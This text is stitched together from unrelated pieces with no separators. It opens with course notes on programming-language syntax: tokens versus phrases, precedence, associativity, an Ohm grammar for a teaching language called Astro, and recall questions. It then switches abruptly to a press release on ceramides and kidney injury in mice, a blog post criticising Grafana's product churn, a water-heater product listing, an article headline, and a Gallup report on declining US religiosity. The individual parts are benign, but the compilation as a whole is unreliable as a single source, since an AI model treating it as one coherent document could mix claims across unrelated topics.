Lexical vs. Phrase Syntax

Did you notice that some of our syntax categories (Program, Statement, Exp) were capitalized and others (id, numeral, letter, digit) were not? Why did we do this?

The latter things are very primitive. They cannot have internal spaces. We call these tokens . Think of these as basic “words”. The former, called phrases , are more complex. Think of them as sentences. They are made up of tokens that can be separated by spaces. Tokens and phrases are very different, so we should denote them differently.

Exercise : Is capitalization a good convention for distinguishing tokens from phrases? Is it biased against languages that don’t distinguish capital and small letters?

So what are spaces—those characters that can separate tokens from each other? We’ll take them to be any Unicode space character. But we also want comments to separate tokens. Let’s define how comments should look in our language, and add them to the special space category:

space      += "//" (~"\n" any)*

Exercise : Explain why this reads as “a comment starts with two slashes and goes to the end of the line.”

Let’s take a deeper look into how the lexical and phrase syntaxes differ. As a specific example, this program:

  print( // ⿇🌿
420 );

is made up of these characters:

SPACE SPACE LATIN SMALL LETTER P LATIN SMALL LETTER R LATIN SMALL LETTER I LATIN SMALL LETTER N LATIN SMALL LETTER T LEFT PARENTHESIS TAB SOLIDUS SOLIDUS SPACE KANGXI RADICAL HEMP HERB LINEFEED DIGIT FOUR DIGIT TWO DIGIT ZERO SPACE RIGHT PARENTHESIS SEMICOLON

Following the lexical syntax, skipping the spaces (and comments), we get the token stream :

print ( num(420) ) ;
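
For a feel of what the lexical syntax is doing, here is a hedged sketch of a hand-rolled scanner for Astro (the real course compilers let Ohm do this work, and this sketch only recognizes ASCII letters plus π):

// Group characters into tokens, skipping spaces and //-comments.
function* tokens(source) {
  const skip = /(\s|\/\/[^\n]*)+/y;   // spaces and comments
  const token = /\d+(\.\d+)?([Ee][+-]?\d+)?|[A-Za-zπ][A-Za-z0-9_]*|\*\*|[-+*/%=();,]/y;
  let pos = 0;
  while (pos < source.length) {
    skip.lastIndex = pos;
    if (skip.test(source)) pos = skip.lastIndex;
    if (pos >= source.length) break;
    token.lastIndex = pos;
    const lexeme = token.exec(source);
    if (!lexeme) throw new Error(`Unexpected character at position ${pos}`);
    yield lexeme[0];
    pos = token.lastIndex;
  }
}

console.log([...tokens("  print( // ⿇🌿\n420 );")]);  // [ 'print', '(', '420', ')', ';' ]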

Following the phrase syntax, we can uncover the underlying parse tree :

420parsetree.png

A very important thing to note: The frontier of the parse tree is the token stream .

Exercise : Repeat this phrase to yourself five times: The frontier of the parse tree is the token stream.

The parse tree ends at tokens, not characters

Please take the time to consider how silly it would be if the parse tree expanded all of the lexical rules down to characters. Having the parse tree stop at tokens is a good example of what we would call “breaking a complex problem down into simpler parts.”

Another term for “parse tree” is concrete syntax tree (CST).

Ambiguity

How are we doing so far? We are able to distinguish well-structured Astro programs from all other Unicode strings. But there are some things we haven’t dealt with yet. For one, we have some strings with multiple structural forms. For example, the phrase 9-3*7 can be parsed in two ways:

ambiguity.png

Having more than one parse tree for a given input string means that our syntax description is ambiguous . It’s possible to handle this particular kind of ambiguity in the syntax. Here’s how.

Precedence

We can create rules that force certain operators to be applied before others; that is, the precedence of operators can be enforced in our syntax definition. To do so, we define additional syntactic categories. We say:

  • An expression is a sequence of one or more terms , separated by additive operators.
  • A term is a sequence of one or more factors , separated by multiplicative operators.
  • A factor is made up of primaries , separated by exponentiation operators, or a factor can just be a negated primary.
  • A primary is the most basic expression possible: either a simple identifier, a numeral, a call, or a parenthesized expression. Parentheses allow unlimited nesting.

So let’s revise our syntax specification:

Exp         = Term ( ("+" | "-") Term )*
Term        = Factor ( ("*" | "/" | "%") Factor )*
Factor      = Primary ( "**" Primary )*
            | "-" Primary
Primary     = numeral | id | id "(" (Exp ("," Exp)*)? ")" | "(" Exp ")"

Great! Now there is one and only one parse tree for that previously problematic expression:

nonambiguity.png

Note that the new syntax has forced the binary operators into a precedence hierarchy!

  • + and - have the lowest precedence.
  • * , / , and % have the next higher precedence.
  • ** has the highest precedence.

Of course, you can think of parenthesized expressions as being done before anything else, though we don’t usually think of these as operators.

Exercise : Precedence is usually a concept that applies only to binary operators, but the way in which unary operators mix with binary operators does need to be addressed. For instance, how should -3**2 be parsed? In Python, exponentiation precedes negation, like -(3**2) . In Elm, negation precedes exponentiation, like (-3)**2 . Astro follows JavaScript and simply does not allow this expression (forcing programmers to use parentheses in this case)! Show how this is done.

Exercise : Our specification does not allow -3**2 as an expression, but it does allow -3+2 and -3*2 . Why did we care only enough to ensure negation did not mix with exponentiation, but we were fine with it mixing with addition and multiplication?

Associativity

Wait, we are not done with structuring our operators just yet. The way things stand now, the parse tree for 3-8-5 looks pretty flat:

flatexpression.png

It doesn’t suggest whether we mean to compute (3-8)-5 (which would be -10) or 3-(8-5) (which would be 0). We can give a syntax that makes this clear. In our design, let’s make the additive and multiplicative operators left-associative and the exponentiation operator right-associative :

Exp         = Exp ("+" | "-") Term
            | Term
Term        = Term ("*" | "/" | "%") Factor
            | Factor
Factor      = Primary "**" Factor
            | "-" Primary
            | Primary

How the heck does this work? Study these parse trees, and hopefully the insight will come to you! (Hint: remember the syntax is designed to force the tree to “come out” a certain way.)

associativity.png

Exercise : Study this until you understand it well.
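
For numeric intuition about what is at stake, note that JavaScript happens to make the same choices we just made: binary - is left-associative and ** is right-associative. A tiny sketch:

console.log((3 - 8) - 5);    // -10, the grouping our left-associative rule produces
console.log(3 - (8 - 5));    // 0, the grouping we are ruling out
console.log(3 - 8 - 5);      // -10, so JavaScript agrees: "-" associates left
console.log(2 ** 3 ** 2);    // 512, i.e. 2 ** (3 ** 2): "**" associates right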

Grammars

The notation we’ve been using to precisely describe our syntax is a kind of a grammar . In fact, it is very close to a specific kind of grammar called an Ohm Grammar . Ohm requires a bit more ceremony than what we’ve been using so far. We’ll just jump right in and extend our work so far to a complete and working Ohm grammar:

astro.ohm

Astro {
  Program     = Statement+
  Statement   = id "=" Exp ";"                         --assignment
              | print Exp ";"                          --print
  Exp         = Exp ("+" | "-") Term                   --binary
              | Term
  Term        = Term ("*" | "/" | "%") Factor          --binary
              | Factor
  Factor      = Primary "**" Factor                    --binary
              | "-" Primary                            --negation
              | Primary
  Primary     = id "(" ListOf<Exp, ","> ")"            --call
              | numeral                                --num
              | id                                     --id
              | "(" Exp ")"                            --parens

  numeral     = digit+ ("." digit+)? (("E" | "e") ("+" | "-")? digit+)?
  print       = "print" ~idchar
  idchar      = letter | digit | "_"
  id          = ~print letter idchar*
  space      += "//" (~"\n" any)*                      --comment
}
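
You do not have to wait for the editor to exercise a grammar like this. Here is a minimal sketch, assuming Node.js with the ohm-js package installed and the grammar saved as astro.ohm; it simply checks a few strings against the default start rule:

// Load the Astro grammar and try it on a few candidate programs.
import * as ohm from "ohm-js";
import * as fs from "node:fs";

const astroGrammar = ohm.grammar(fs.readFileSync("astro.ohm", "utf8"));

const samples = [
  "radius = 55.2 * (-cos(2.8E-20) + 89) % 21;",  // should match
  "print hypot(2.28, 3 - radius) / the_area;",   // should match
  "printy = 3;",                                 // should match: printy is just an id
  "print 2 +;",                                  // should fail
];

for (const source of samples) {
  const result = astroGrammar.match(source);
  console.log(result.succeeded() ? "  ok:" : "fail:", source);
}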

When you are designing your language, you will build up your grammar iteratively, from increasingly more complex examples, and test the grammar as you go. Tools will help you here! If you are using Ohm, and you should, take advantage of the Ohm Editor . This is an amazing tool for experimenting with programming languages.

Ohm Editor Screenshot

In the upper left panel, design your grammar. You can load/save from your browser’s local storage, and even publish gists to GitHub. In the lower left panel, enter test cases: both tests you want to succeed (thumbs up) and those you want to fail (thumbs down). The right panel is an interactive concrete syntax tree for the currently selected test case.

This tool will save you a lot of time.

It is an essential component of your language design toolbox.

How essential is it?

Unless your language is trivial, tools like the Ohm Editor are very important! Design is an iterative process, and creativity is enabled and enhanced with immediate feedback. So you should design with tools that allow you to experiment and test your ideas.

That said, it is true that in practice, many production-level compilers do not use Ohm or related tools like ANTLR, Bison, etc.—they do everything by hand. But developers that go this route will write their grammar tests concurrently with their design.

CLASSWORK

Let’s do a code-along with the Ohm Editor for developing the Astro grammar. During the code-along, note how examples are done first, and note how we will evolve from the basics to more complex features, bringing in notions such as precedence and associativity where needed.

During the code-along, bits of Ohm will be introduced as needed. In a subsequent course unit, we will cover Ohm in detail.

Defining the Statics

Question: Does the grammar we defined above for Astro capture the following (desirable) rule:

“You can only use an identifier if it has been previously assigned to.”

Answer: It does not.

Exercise : Show that it does not. Hint: Is print x; a legal program according to the grammar?

Exercise : Show how to capture the rule in a grammar. Hint: Do not be frustrated if you cannot.

Enforcing this rule requires knowledge of context . That is, the syntactic rule for producing expressions such as calls and arithmetic operations would need to somehow know which identifiers appeared on the left hand side of some previous assignment statement. This turns out to be so hard that even designers of real programming languages omit enforcement of contextual rules from the grammar! In fact, while the official grammar for Java will not derive this program:

class A {2 / == {{;

and report a syntax error , a Java compiler will say that this program:

class A {int x = y;}

is structurally well formed according to the official syntax of the Java language! The compilation unit consists of a type declaration that is a class declaration whose body consists of a field declaration with a type, a name, and an initializing expression which is an identifier. But we know this program is not legal, since the identifier y has not been declared. It’s not only Java whose grammar accepts illegal programs: pretty much every programming language uses a grammar to define structural rules only, and specifies contextual rules in prose, or in a separate semantic definition.

For Astro, we will “define” the following contextual rules:

  1. The following identifiers are built-in:
    • π , a number
    • sqrt , a function of exactly one argument
    • sin , a function of exactly one argument
    • cos , a function of exactly one argument
    • hypot , a function of exactly two arguments
  2. An identifier cannot be used in an expression unless it is one of the built-in identifiers or has been previously assigned to.
  3. All function calls must accept the proper number of arguments.
  4. The built-in identifiers cannot be assigned to.
  5. Identifiers declared as functions can only be called, not used in any other context. Identifiers declared as numbers cannot be called.
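
To see what enforcing rules like these looks like outside of a grammar, here is a minimal sketch of a checker in JavaScript. It is not the official Astro analyzer; it just assumes someone walks the program statement by statement and calls these helpers at the right moments:

// A made-up context: names bound so far, seeded with Astro's built-ins (rule 1).
const context = new Map([
  ["π", { kind: "number" }],
  ["sqrt", { kind: "function", arity: 1 }],
  ["sin", { kind: "function", arity: 1 }],
  ["cos", { kind: "function", arity: 1 }],
  ["hypot", { kind: "function", arity: 2 }],
]);
const builtins = new Set(context.keys());

function checkAssignment(name) {
  if (builtins.has(name)) throw new Error(`Cannot assign to built-in ${name}`); // rule 4
  context.set(name, { kind: "number" });
}

function checkVariableUse(name) {
  const entity = context.get(name);
  if (!entity) throw new Error(`${name} has not been assigned to`);             // rule 2
  if (entity.kind !== "number") throw new Error(`${name} is not a number`);     // rule 5
}

function checkCall(name, argumentCount) {
  const entity = context.get(name);
  if (!entity) throw new Error(`${name} has not been assigned to`);             // rule 2
  if (entity.kind !== "function") throw new Error(`${name} cannot be called`);  // rule 5
  if (entity.arity !== argumentCount) {
    throw new Error(`${name} expects ${entity.arity} argument(s)`);              // rule 3
  }
}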

For more complex languages, the statics definition (contextual rules) can be quite large. Here are some things that might appear:

  • Identifiers have to be declared before they are used.
  • Identifiers may not be used in a place where they may have not yet been initialized.
  • Identifier declarations must be unique within a scope, unless a language provides overloading.
  • All expressions must be used according to their type.
  • Identifiers must be used according to (1) their scope , (2) their access modifiers (private, protected, package, public, whitelist, blacklist, ...), and (3) any other meta-level attributes (enumerable, configurable, writable, deletable, callable, ...).
  • Arguments must match up with parameters in terms of number, order, name, mode, and type.
  • break and continue statements may only appear in a loop. return statements may only appear in a function (it’s possible to encode these restrictions in the grammar, but it would be ugly).
  • All paths through a function must have a return.
  • All possible matches in a pattern match expression, or a switch statement, must be covered.
  • When inheriting from a base class with abstract methods, or implementing an interface, all abstract methods must be implemented, or the derived class must be declared abstract.
  • All declared local variables must be subsequently read, and declared private functions must be called.

Defining the Dynamics

The dynamics for most programming languages are given in prose. If your language is simple enough, a formal semantic definition is possible. For the sample languages in this course, Astro and Bella are given both informal and formal semantic definitions. We’ll not be studying formal semantics at this time, but feel free to study the definitions on your own.

Prototyping

During your language design, you will want to whip up a simple interpreter to, at the very least, make sure your design is reasonable. You may wish to develop your interpreter in parallel with your language design.

Ohm was designed for prototyping programming languages, so it is a natural choice. The Ohm Editor, as we just saw, helps you design the syntax. To write an actual interpreter, we’ll have to go much deeper into Ohm. We’ll be doing this in our next unit of study in this course, which is, indeed, a deep study of Ohm .

Examples

Many well-known programming languages have published, formal definitions. You can find them by searching the web.

For this class, we will be studying five little languages crafted especially to help you in your study of language design and implementation. We will be studying them in order, building upon previous languages and learning new things as we progress. This will allow us to introduce the huge topic of language processing in a practical setting, writing real compilers for real languages. The languages are Astro, Bella, Carlos, Dax, and Ekko.

Astro

Astro logo

We all begin as a white belt in every new endeavor. We will start, then, with a very simple, almost trivial, language. All it has are numbers, arithmetic operators, variables, and a few pre-defined constants and functions. Here’s an example program:

// A simple program in Astro
rAd1uS = 55.2 * (-cos(2.8E-20) + 89) % 21;
the_area = π * rAd1uS ** 2;
print(hypot(2.28, 3 - rAd1uS) / the_area);    // woohoo 👻

There are only two kinds of statements: assignments and print statements. Expressions include numbers, variables, function calls, arithmetic expressions with + , - , * , / , % , and ** , and can be parenthesized. We will cover the official definition of the language , and use the language to motivate a formal study of syntax.

When studying this language, we’ll learn about the separation of context-free syntax from contextual rules. Contextual rules include such things as: having to match the number of arguments in a call with the number of defined parameters, rudimentary type checking, and not allowing assignments to read-only variables.

As Astro will be our first language, we will use it as a case study to learn the amazing Ohm Language Library to build an interpreter . The details of how the interpreter is constructed are covered in the course notes on Ohm .

Bella

Bella logo

Our second language has a few things Astro does not: a richer set of operators, variable declarations, and user-defined functions. The contextual rules for Bella are much richer than those of Astro, since we now have actual declarations, and scope! Here’s an example program:

let dozen = 12;
print dozen % 3 ** 1;
function gcd(x, y) = y == 0 ? x : gcd(y, x % y);
while dozen >= 3 || (gcd(1, 10) != 5) {
  dozen = dozen - 2.75E+19 ** 1 ** 3;
}

We will first look at the official specification , introducing all sorts of interesting concepts. Then we’ll study a real, actual Bella compiler . Here we learn about designing and architecting a compiler, building the components (analyzer, optimizer, and generator), and getting 100% test coverage. The compiler source code is on GitHub .

Carlos

Carlos logo

In our third language, we encounter arrays, structs, and optionals: our first language that is basically useful. If you are taking the compiler course for which these notes were written, Carlos is a good example of the minimal language complexity you will need for your term project.

const languageName = "Carlos";

function greeting() {
  return random(["Welcome", "こんにちは", "Bienvenido"]);
}

print("👋👋👋");
repeat 5 {
  print(greeting() + " " + languageName);
}

We’ll be visiting the language’s official specification and a compiler on GitHub . The compiler (of course!) uses the Ohm Language Library.

There’s no separate page of notes describing the compiler. After studying the Astro and Bella compilers, you’ll be able to find your way around the code on GitHub (there’s documentation). And don’t worry, its development and usage will be covered in class, and the teaching staff can help you with any questions you might have.

Dax

Dax logo

Language number four is a functional language, that is, a language with no assignments! The only binding of names to entities happens when passing arguments to parameters, though there is that famous let declaration which nicely sugars a function call: it’s nicer to say let x = 5 in x * y end than {x => x * y}(5) .

Here’s a sample program to get the feel for the language:

let
  gcd = {x => {y => y == 0 ? x : gcd y (x % y)}};
  z = 5
in
  [1, 3, z] |> filter {x => x > 2} |> map {x => x ** 2} |> print
  then
  "hello" |> substring 2 5 |> print
  then
  print (gcd 33 99)   // This is fine, you don't HAVE to use |>
end

If you have not yet seen languages with the awesome |> operator, here’s your chance to be wowed.

We will discuss the language design and compiler later in the course.

Ekko

Ekko logo

Our fifth language, Ekko (starting with E like Erlang and Elixir, which greatly influence it), is a kind of experimental language that deals quite a lot with time .

Ekko mixes styles of asynchronous programming from JavaScript and the distributed process-orientation of Erlang and Elixir: Ekko’s future objects are based on JS promises, and its processes communicate via messages as in Erlang. There’s also quite a bit more temporal goodness, including timeout calls, value histories with time travel (influenced by older versions of Elm), and even explicit parallelism.

More Examples

Students in previous iterations of the course have designed and implemented their own languages. Here’s a sampling of languages over the past decade or so. (Please note that there is a very wide variety of quality in these examples. They are presented here without any evaluative commentary as to whether they are suitable building blocks for one’s own project.)

Recall Practice

Here are some questions useful for your spaced repetition learning. Many of the answers are not found on this page. Some will have popped up in lecture. Others will require you to do your own research.

  1. What are the four phases of programming language design?

    (1) Working out the desired context (audience, purpose, scope), (2) sketching example programs, (3) formalizing the syntax and semantics, and (4) prototyping.

  2. Name five programming language paradigms.

    A few are: imperative, declarative, structured, object-oriented, functional, applicative, concatenative, logic, protocol-oriented, aspect-oriented, array, event-driven, dataflow, agent-based. There are others.

  3. What were the four big ideas in programming languages mentioned in Bret Victor’s Future of Programming talk?

    (1) Direct manipulation of data rather than showing the code, (2) Goals and constraints rather than procedures, (3) Spatial representation of code rather than textual representations, and (4) Concurrent computation rather than sequential

  4. What language did Alan Kay feature in his Programming Languages video?

    eToys

  5. What are some things to decide upon while undertaking language design?

    The audience, the purpose, the scope, the problem domain it is targeted to, whether it is practical or esoteric, whether it has a simple foundation or favors pragmatism, its concurrency model.

  6. In what essay did Bret Victor lay out several principles that languages and programming environments should follow to aid their users’ learning?

    Learnable Programming

  7. What is abstract syntax?

    The structure of a program without regard to the specific syntax used to represent it.

  8. What is the name of the specification of JavaScript’s abstract syntax?

    ESTree

  9. At what web address can you find an interactive JavaScript AST builder?

    https://rtoal.github.io/js-ast/

  10. What are five approaches of showing (concrete) syntactic structure in popular programming languages?

    Curly braces, indentation, terminal-ends, parentheses, postfix

  11. What is an example of a programming language for which newlines are significant?

    Answers include Python and Ruby

  12. What is syntactic sugar?

    Syntax within a programming language that is designed to make certain phrases more clear, concise, or elegant than the basic forms defined in the language.

  13. What is syntactic salt?

    Syntax within a programming language that is designed to make certain phrases more confusing, verbose, or awkward than the basic forms defined in the language.

  14. What is a candygrammar?

    A grammar that is mostly syntactic sugar, trying to look sweet and natural-language-like; it appears good but turns out to be bad for you.

  15. What is a golfing language?

    A language designed to be as terse as possible, often for the purpose of helping you win shortest-possible code challenges.

  16. What are some examples of golfing languages?

    CJam, Pyth, Stax, GolfScript, 05Ab1E

  17. What are three styles of programming language definition?

    Informal, formal, and executable

  18. What is the difference between syntax and semantics?

    Syntax deals with program structure. Semantics deals with program meaning.

  19. What is the difference between a language’s statics and its dynamics ?

    Statics refers to the rules that can be checked at compile time. Dynamics refers to the rules that can only be checked at run-time.

  20. How are syntax definitions generally split into lexical and phrase syntaxes?

    Lexical syntax defines how individual characters are grouped into words (tokens), while phrase syntax defines how these tokens are combined to form larger structures.

  21. What is a parse tree?

    A tree that describes the syntactic structure of a program as defined by the language’s syntax.

  22. The frontier of the parse tree is the program’s __________.

    Token stream

  23. A parse tree is also called a __________.

    Concrete syntax tree

  24. What does it mean for a syntactic specification to be ambiguous?

    There exists at least one program that has more than one parse tree.

  25. What attributes of operators are generally used to disambiguate a syntactic specification?

    Precedence and associativity

  26. What tool is provided by the authors of the Ohm library to help you prototype a new language design?

    The Ohm Editor

  27. What was the title of Alex Warth’s dissertation?

    Experimenting with Programming Languages

  28. What are some examples of legality rules that are considered too hard to be captured in a grammar and are thus typically defined within a program’s static semantics?

    You can only use an identifier if it has been previously assigned to, all function calls must accept the proper number of arguments, the built-in identifiers cannot be assigned to, identifiers declared as functions can only be called, not used in any other context, identifiers declared as numbers cannot be called, type checking, access checking (private, public), declared identifiers must be initialized or must be read. (There are many more.)

  29. What example programming languages have been designed for this course?

    Astro, Bella, Carlos, Dax, Ekko

Summary

We’ve covered:

  • The cycle of language design phases
  • What to know before undertaking language design
  • Pointers to excellent articles and essays about language design
  • Two videos (one by Alan Kay, one by Bret Victor) on languages and language design
  • How to begin the language design process
  • Questions to ask while designing your language
  • Concepts and features to think about when sketching during design
  • Abstract Syntax
  • Concrete Syntax
  • The use of the Ohm Editor in language prototyping
  • (Formal) Language Definition
  • Brief notes on five example languages

Scientists reverse kidney damage in mice, hope for humans next


Serious injury to short-term kidney function, known as acute kidney injury (AKI), can be life-threatening and also raise the likelihood of developing permanent chronic kidney disease. AKI can occur after major stressors such as sepsis or heart surgery, and more than half of all intensive care patients experience it. No approved medications currently exist to treat this condition.

Researchers at University of Utah Health (U of U Health) have discovered that fatty molecules called ceramides initiate AKI by damaging the mitochondria that supply energy to kidney cells. By using a backup drug candidate designed to alter how ceramides are processed, the team protected mitochondrial structure and prevented kidney injury in mice.

"We completely reversed the pathology of acute kidney injury by inactivating ceramides," says Scott Summers, PhD, distinguished professor and Chair of the Department of Nutrition and Integrative Physiology in the University of Utah College of Health and senior author on the study. "We were stunned -- not only did kidney function stay normal, but the mitochondria were unscathed," Summers says. "It was truly remarkable."

The results are published in Cell Metabolism .

Ceramide spikes may serve as an early warning

Earlier studies from the Summers lab showed that ceramides can harm organs such as the heart and liver. When the researchers measured ceramides in AKI models, they found a strong connection: levels rose sharply after injury in both mice and in human urine samples.

"Ceramide levels are very elevated in kidney injury," says Rebekah Nicholson, PhD, first author on the work, who completed the research as a graduate student in nutrition and integrative physiology at U of U Health and is now a postdoctoral fellow at the Arc Institute. "They go up quickly after damage to the kidneys, and they go up in relation to the severity of the injury. The worse the kidney injury is, the higher the ceramide levels will be."

These findings indicate that urinary ceramides could act as an early biomarker for AKI, giving clinicians a tool to identify vulnerable patients, including those preparing for heart surgery, before symptoms begin. "If patients are undergoing a procedure that we know puts them at high risk of AKI, then we can better predict whether or not they're actually going to have one," Nicholson says.

Altering ceramide production protects kidney function

The team nearly eliminated kidney injury in a mouse model by modifying the genetic program that controls ceramide production. This change produced "super mice" that did not develop AKI even under conditions that typically cause severe damage.

The researchers then tested a ceramide-lowering drug candidate created by Centaurus Therapeutics, a company co-founded by Summers. Mice treated ahead of time avoided kidney injury, maintained normal kidney function, remained active, and had kidneys that appeared close to normal under the microscope. Nicholson notes that their model places extreme stress on the kidneys, making it "really remarkable that mice were protected from the injury."

"These mice looked incredible," Summers adds.

The team found that ceramides harm mitochondria, the parts of the cell responsible for energy production. Damaged mitochondria in kidney cells become distorted and function poorly. Adjusting ceramide production, whether genetically or with the drug, kept mitochondria intact and working even under strain.

Potential for future therapies targeting mitochondrial health

Summers explains that the compound used in this study is closely related to, but not identical to, the ceramide-lowering drug that has entered human clinical testing. He emphasizes that mouse results do not always predict human outcomes and that further research is needed to confirm safety.

"We're thrilled by how protective this backup compound was, but it's still preclinical," Summers says. "We need to be cautious and do our due diligence to make sure this approach is truly safe before moving it into patients."

Even so, the researchers are encouraged by the findings. If the results extend to people, the drug could potentially be administered ahead of time to individuals who face a high risk of AKI, including patients undergoing heart surgery, where about one quarter experience the condition.

Because the drug appears to work by maintaining mitochondrial health, the team believes that the approach may have relevance for other disorders linked to mitochondrial dysfunction.

"Mitochondrial problems show up in so many diseases -- heart failure, diabetes, fatty liver disease," Summers says. "So if we can truly restore mitochondrial health, the implications could be enormous."

The results are published in Cell Metabolism as "Therapeutic Remodeling of the Ceramide Backbone Prevents Kidney Injury."

Funding and disclosures

This work was supported by a NCRR Shared Instrument Grant, the Kidney Precision Medicine Project, and several branches of the National Institutes of Health, including the National Cancer Institute (P30CA042014, CA272529), the National Institute of Diabetes and Digestive and Kidney Diseases (DK115824, DK116888, DK116450, DK130296, DK108833, DK112826, 1F31DK134088 and 5T32DK091317), and the National Institute of General Medical Sciences (3R35GM131854 and 3R35GM131854-04S1). Additional support came from the Juvenile Diabetes Research Foundation (JDRF 3-SRA-2019-768-A-B and JDRF 3-SRA-2019-768-A-B to WLH), the Burroughs Wellcome Fund Postdoctoral Diversity Enrichment Program (1058616), the American Diabetes Association, the American Heart Association, the Margolis Foundation, and the University of Utah Diabetes and Metabolism Research Center. The authors state that the content is their responsibility and does not necessarily reflect the views of the National Institutes of Health.

Scott Summers and Jeremy Blitzer are co-founders and shareholders of Centaurus Therapeutics. Liping Wang is also a shareholder. DN and Blitzer are listed as inventors on US Patents 1177684, 11597715, and 11135207 licensed to Centaurus Therapeutics, Inc.

I can't recommend Grafana anymore


Published: 14/11/2025
6 minute read



Disclaimer: This describes my personal experiences with Grafana products. It also includes some facts, but your experience may vary entirely, and I would love to hear your take.


I started my work life at a small software company near my university. They develop and run websites and operate web services for multiple clients. Everyone had multiple responsibilities, and they heavily relied on interns and freshmen—which can be both bad and good.
For me it was good because I learned a lot.

At some point we needed a monitoring solution, and Zabbix didn’t fit well into the new and declarative world of containers and Docker. I was tasked to find a solution. I looked at Loki/Prometheus with Grafana and Elastic with Kibana. Elastic was a beast: heavy, hard to run, resource-hungry, and complex. Loki and Prometheus were the perfect fit back then.

So I created a docker-compose.yaml with Loki, Prometheus and Grafana. Since they all shared the internal Docker network, we required no auth between them. Grafana was only exposed over an SSH tunnel. One static scrape config and the Docker Loki log plugin later, we had our observability stack. For non-Docker logs, we used Promtail. Loki and Prometheus stayed on the same machine and all we required was a local volume mount. Load was minimal.

ℹ️ This is when I learned that you should not transform every log parameter into a label just to make it easier to select in the Grafana UI. Having a label for latency with basically limitless values will fill every disk’s inodes; that’s just how Cortex bin-packs.

I also found out Grafana Labs has a cloud offering with a nice free tier. So I even used this for personal stuff. I had a good experience with them.

Time goes on, and I switched jobs. Now we have Kubernetes.
The Prometheus container was now switching nodes. Roaming storage was a problem back then, and our workload also increased by a lot. We also needed long-term storage (13 months). So I looked around and found Thanos and Mimir.
Previous experiences with Grafana products had been good, so I chose Mimir. It should be similar to Loki since both are based on Cortex. Now we didn’t really need Prometheus anymore; we had only been using remote_write from Prometheus. Grafana had a solution for this: with the Grafana Agent, you can ship both logs and metrics to a remote location, all in one binary. This seemed like a no-brainer.

Time goes on, and Grafana changed the Grafana Agent setup to Grafana Agent Flow Mode. Some adjustments, but okay, software changes. And man, did Grafana like to change things.

They started to build their own observability platform to steal some of DataDog’s customers. They created Grafana OnCall, their own notification system. Not only that, but they heavily invested in Helm charts and general starter templates. Basically two commands to install the metric/log shippers and use Grafana Cloud. And even if you don’t want to or can’t use Grafana Cloud, here are the Helm charts to install Mimir/Loki/Tempo. To make things even easier, let’s put it all in an umbrella chart (it renders to 6k lines in the default state). Or use their Grafana Operator to manage Grafana installs, or at least parts of it.

As many may have experienced, the cost of software maintenance shows with age.
Grafana OnCall is deprecated, and Grafana Agent and Agent Flow were deprecated within 2-3 years of their creation. Some of the easy-to-use Helm charts are not maintained anymore. They also deprecated Angular within Grafana and switched to React for dashboards, which broke most existing dashboards.

On the same day they deprecated the Grafana Agent, they announced Grafana Alloy, the all-in-one replacement. It can do logs, metrics, traces (Zipkin & Jaeger) and OTEL. The solution for everything!
The solution had a somewhat rough start and was a little buggy, but it got better over time. The Alloy Operator also entered the game, because why not.

ℹ️ They chose to use their own configuration language for Alloy, something that looks like HCL. I can understand why they didn’t want to use YAML, but I’m still not a fan of this. Not everything needs its own DSL.

Happy end, right? Not quite.
The all-in-one solution does not support everything. While Grafana built their own monitoring empire, the kube-prometheus community developed steadily and organically. The Prometheus Operator with its ServiceMonitor and PodMonitor CRDs became the de facto standard. So Alloy also supports the monitoring.coreos.com api-group CRDs, or at least parts of them. It natively works with ServiceMonitor and PodMonitor , but PrometheusRules needs extra configuration. The AlertmanagerConfig CRD, which would need to be implemented in Mimir, is not supported, because Mimir brings its own Alertmanager, at least sort of. There are version differences and small incompatibilities.

But I got it all working; now I can finally stop explaining to my boss why we need to re-structure the monitoring stack every year.

Grafana just released Mimir 3.0. They re-architected the ingestion logic for scalability, and now they use a message broker. Yes, Mimir in version 3.0 needs Apache Kafka to work.
None of the above things alone would be a reason to ditch Grafana products. Set aside the fact that they have now made it incredibly difficult to find the ingestion endpoints for Grafana Cloud, since they want to push users toward their new fleet-config management service. But all of this together makes me uncomfortable recommending Grafana stuff.
I just don’t know what will change next.

I want stability for my monitoring; I want it boring, and that’s something Grafana is not offering. It seems like the pace within Grafana is way too fast for many companies, and I know for a fact that that pace is partially driven by career-driven development. There are some smart people at Grafana, but not every customer is that sharp or has the capacity to make Grafana their number-one priority. Complexity kills; we’ve seen this.

ℹ️ Don’t get me wrong: Mimir, Loki and Grafana are technically really good software products and I (mostly) still like them, but it’s the way these products are managed that makes me question them.

Sometimes I wonder how I would see this if I had chosen the ELK stack at my first job. I also wonder if the OpenShift approach (kube-prometheus-stack) with Thanos for long-term storage is the most time-stable solution. I just hope OTEL settles down, gets stable and boring fast, and lets me pick whatever I want for my backend. Because right now I’m done with monitoring. I just want to support our application and not revisit the monitoring setup every x weeks, because monitoring is a necessity, not the product. At least for most companies.

Meet Reservoir – The World's Smartest Water Heater

Hacker News
www.reservoirhome.com
2025-11-15 03:50:04
Comments...
Original Article

Meet Reservoir

The world’s smartest water heater.

hot water

virtual capacity

the efficiency of gas

annual savings potential

HOW IT WORKS

Thermal Intelligence

A water heater that adapts to you.

What does the world's smartest water heater get you?

More capability in one elegant package.


EASY OPERATION

Have as much (or as little) control as you want. From anywhere.

TESTIMONIALS

First installs in Boston Metro.

ABOUT US

We believe you can have both joy and efficiency.


Over-reliance on English hinders cognitive science

Hacker News
www.cell.com
2025-11-15 02:58:56
Comments...

Drop in U.S. Religiosity Among Largest in World

Portside
portside.org
2025-11-15 02:15:14
Drop in U.S. Religiosity Among Largest in World barry Fri, 11/14/2025 - 21:15 ...
Original Article

WASHINGTON, D.C. — The 17-point drop in the percentage of U.S. adults who say religion is an important part of their daily life — from 66% in 2015 to 49% today — ranks among the largest Gallup has recorded in any country over any 10-year period since 2007.

About half of Americans now say religion is not an important part of their daily life. They remain as divided on the question today as they were last year.

Such large declines in religiosity are rare. Since 2007, only 14 out of more than 160 countries in the World Poll have experienced drops of over 15 percentage points in religious importance over any 10-year period.

Only a small number of mostly wealthy nations have experienced larger losses in religiosity, including Greece from 2013-2023 (28 points), Italy from 2012-2022 (23 points), and Poland from 2013-2023 (22 points). Other countries, including Chile, Türkiye and Portugal, have seen declines similar in magnitude to the U.S. decline.


U.S. Lags Behind Global Median for Religiosity, Closes Gap With OECD

As religiosity has declined in the U.S., the gap between the U.S. and the global median has widened. The global median for religiosity has remained stable for nearly two decades, averaging 81% since 2007 and reaching 83% last year, the most current full-year data available.

